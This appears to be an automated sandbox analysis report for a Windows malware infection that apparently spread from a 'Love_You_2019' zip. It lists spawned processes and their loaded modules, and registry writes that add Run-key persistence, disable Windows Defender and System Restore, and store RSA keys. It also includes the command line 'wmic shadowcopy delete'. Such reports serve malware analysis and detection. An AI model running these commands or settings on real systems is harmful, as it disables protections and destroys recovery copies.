c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\windows\system32\apphelp.dll

PID
2992
CMD
C:\Users\admin\657607470096780\winsvcs.exe
Path
C:\Users\admin\657607470096780\winsvcs.exe
Indicators
Parent process
3580527067.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\657607470096780\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\2495831141.exe
c:\users\admin\appdata\local\temp\4177133078.exe

PID
2496
CMD
C:\Users\admin\4950606094303050\wincfg32svc.exe
Path
C:\Users\admin\4950606094303050\wincfg32svc.exe
Indicators
Parent process
3327529366.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\4950606094303050\wincfg32svc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll

PID
2452
CMD
C:\Users\admin\AppData\Local\Temp\3478239163.exe
Path
C:\Users\admin\AppData\Local\Temp\3478239163.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3478239163.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2188
CMD
C:\Users\admin\AppData\Local\Temp\2495831141.exe
Path
C:\Users\admin\AppData\Local\Temp\2495831141.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2495831141.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msvcr100.dll

PID
3256
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
3478239163.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

PID
2580
CMD
C:\Users\admin\AppData\Local\Temp\4177133078.exe
Path
C:\Users\admin\AppData\Local\Temp\4177133078.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\4177133078.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\msvcr100.dll

PID
3116
CMD
C:\Users\admin\AppData\Local\Temp\1469420263.exe
Path
C:\Users\admin\AppData\Local\Temp\1469420263.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\1469420263.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll

PID
3076
CMD
C:\Users\admin\AppData\Local\Temp\2184730977.exe
Path
C:\Users\admin\AppData\Local\Temp\2184730977.exe
Indicators
No indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\2184730977.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\profapi.dll

Registry activity

Total events
1280
Read events
1114
Write events
164
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
4092
3327529366.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
4092
3327529366.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WinCfgMgr
C:\Users\admin\4950606094303050\wincfg32svc.exe
3128
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3128
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3452
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3452
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3452
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3452
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3576
979574639568794.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\495030305060\winsvcs.exe
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableFileTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
EnableConsoleTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
ConsoleTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
MaxFileSize
1048576
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32
FileDirectory
%windir%\tracing
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableFileTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
EnableConsoleTracing
0
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
ConsoleTracingMask
4294901760
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
MaxFileSize
1048576
2868
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASMANCS
FileDirectory
%windir%\tracing
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2868
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2984
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\Love_You_2019_27201936-txt.zip
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2984
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
@C:\Windows\System32\wshext.dll,-4804
JScript Script File
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2984
WinRAR.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3636
3580527067.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
3636
3580527067.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Microsoft Windows Services
C:\Users\admin\657607470096780\winsvcs.exe
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableScanOnRealtimeEnable
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableOnAccessProtection
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection
DisableBehaviorMonitoring
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallOverride
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
UpdatesDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AutoUpdateDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
FirewallDisableNotify
1
2992
winsvcs.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
DisableSR
1
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2992
winsvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
ext
2E0065007600710075006C006700690068006C000000
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
public
0602000000A40000525341310008000001000100F5566D83CCC3F889839ACB34CB5BA26EA073AE3CC532593645C96BB6210B7250726ECD4E83281C39AB23924088A2ABAD8890AA8C9BA5AEB26B921ADDBCB51C93C268E3B1E4CAE351D75372763108788D0A762F71E3F91E6C66ADA9BF93913D0198705E48B3968557CB2C8EC894E0A6426F2B175F75EA0D6F5CAF4572648B73E4D685D16D124FBC89649577BDFBF3BA701C64E1EE3C851BEA2BBDB675D2CEF3FE5273EC6EA1A750278EEB89580B5BA17DDB108B88BEA9E6818C1277CA27CB6963C0DA69AF059445BE2E64D583DAE2E6DC2CB8BD1A6D31EA73185EBA39CB18C7BB23391A25B1FA699B3651C96BAC66FF0688ECEF101EA4412D36442FAF8A2C83B3
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
private
94040000F15E9901F530C06B524D947D28A173B35BB69A7194F09543E2F7F6C767F8B8304B2AA144D7D3FA1031B8089A394512FE72566101CDE749E3F5BEBFEEAEDD5932132ACAF82A5AE49C973B47799557AE210F503E99BE4E18E49842427D510D7D28EC1E1DAF2E9368477FF5AEB87F9F68912796C3838EFE2CE676C6BC9E58E6AC596282B3F450F4FD8AADF925A53CC4789C62304A52537BB2E7BE72658D199C922C14BDC767FA83D6DDB30D7003007DFBF35AC8899EF70524218A2F72EB1199E8E959A4F0994EF97AFC312BD2F2D9B43F6ABC23A9C7793037E2F0A04A4C9F5A588B39F5841CCB2EF946A13F61B6928B88A6949E4E74831831D04E667D5EFB1FA2727E068D18BC9DFFB553D518E6C43FEA7CC980918B2D4AFE86329C07D498E8E2EFB934DF6EF893ABFF22DB842371789AE55D330B8984F6603A91D5520E2291760CC23F3ED36B46C6319758B0E68DF19DD2881C6CFAC9DB10988F9346498142CCA5A42A2DD940487D6448635FE9B3EC018539E98145B1693FCED4886B514D7F01CB82237CDF3041337BB974093586BE6B4CDDBA3C696FCEE6D774A5D5B83A7AF0CF816EA4118FCE39A41AFCCACE3A7E392F9D01B497A8176775BF4E02919D62465E8F44019B6B1852A79351F27EAC0BAF184B6666B6F54877CB9B96242141593A4E0C548D791A4130FAB53FBFB44EB28E84EE37037C83199E4FE8093DF45D93E55DB5C69CC3196191A1FA7A991B62BA58217D131D2A66DB8BF85B586A463FDA4AE06F845D527159CB6DE43E2A49E522D49F95485CEEDCC5DD256443ABBF32143988D032693CE02588E82A0B9ECFA264B47D55D02E6BF69113E7CA65DE175363B42944527E0A070AA01589EEFD41C658A552C79A508A9E8379A5864763761F1BC2AA630131BD0025C22C2D7C4C6CA9BA3A69080D639582BBE7FB20635337309ECF5ECD351FF72654F39627F26EB0F8F28B3A477B26DBACD10CC55F979C5C0A2FF1BABDF977D004D798D496B3D4AC3E176666B950978CF267FC8A00BF0EA57807939BD3323CFB10031D2AD903D074D2D8657FE78ABF646C3BA7267C6AA505A96B7C1C6B3299221BBDF9C16257156AA2F19F77ADC4F942ABAD09207D46997DD9101052984E00534AFD61AC42F5F649449B6CE80608EAADD1D155C3A9EC5F5677B784782E426AB2106401C1678EB9054B1C71EB58AB3CBF469B47C7014B677C4F9CF99DB1B51FCF29821F0785C8B2F1455F9371C0332321439E7CB5536811F7176D44AF18E01BB545D4692CE055492B1B5A2D530B952F18AFC7A658C96D1AA79A53811AB5AF58F9189F578B7055023090A033FE7B4B8FA98BB25B394623946727F5F2DB372D79FD73E3097FAF96D3E9488184D4BD0E31C5C7E019346D98A922E6B381286EAB8A78884BE4356D0B0650E78B4D4666D001B406FE6F8A93B47236CA8F568BF505A8C8D65F79A4D229CF821BCDBB87468FC3AE18C925E2F5861BABDD627F9E3E9509CDAFCCF39760EF7774238FCB3CF1681602F96E99D1AA65CDA647187EDA3D2FEB0A960F4B753742045DEDBC9D1AB311F85173214CF6CC5B9278578BC223E77F1980C89844C56AC7D20F655D02402F6020E0B65ECCBCC340E706F479B91F7BC36FE1DE88788772309DB102B4A3B7FC1DC384EC62D58DE20329A3130A265FAA60E6E09B8E8A7616F43C70F439FCDAF61AB1076D5122FE715035E2C980AF0AFDAADFE9D18A1A5B1893E416AE9C60F7C400F8554F17FECCC8729FD4B97286DA1616AA7CC4F203BDBF0740AF67376DF02E9BF1E94841C8915B4E3D9CC3ADCB62116D4D94FA80AB0895C7A2DB05B2A191A8F5C15BD1EAAE695DC30A8765850C23EAFC3DCDE1EAE86FBEA27D9FD47E8C7D9F10FD79332D89AA04409B0AC17D569729DFDE419F7FB1434EBEF6676E0B077DF861F4557FBF2C8A2FF8E6927C8787C2C882A274BC334972E13E2BF35A50B6A35C14965342D7C87E7144FBF10A2B80E9F4A008EF85F6A3CE072218FF8FDC27F8734CE8C53136E84DAD587AE235D7D8E675CB7356F97E59589257E570E757B573AA65C783919BC5EF94B78158839E8ECF3BD8B7AA9E589D4563D2DBC237A43977EAFEE9BFF243BA7017AD4D569BF6676DA3EACF6657D9EF5BB3A5BED04D4ECD8BA2BDC6470E3EAC1880B1DB3E9C945F68084C1097D2A51DD6DF966D463E23E92E8BE79E51DBD2125749103AF4F931C38108CA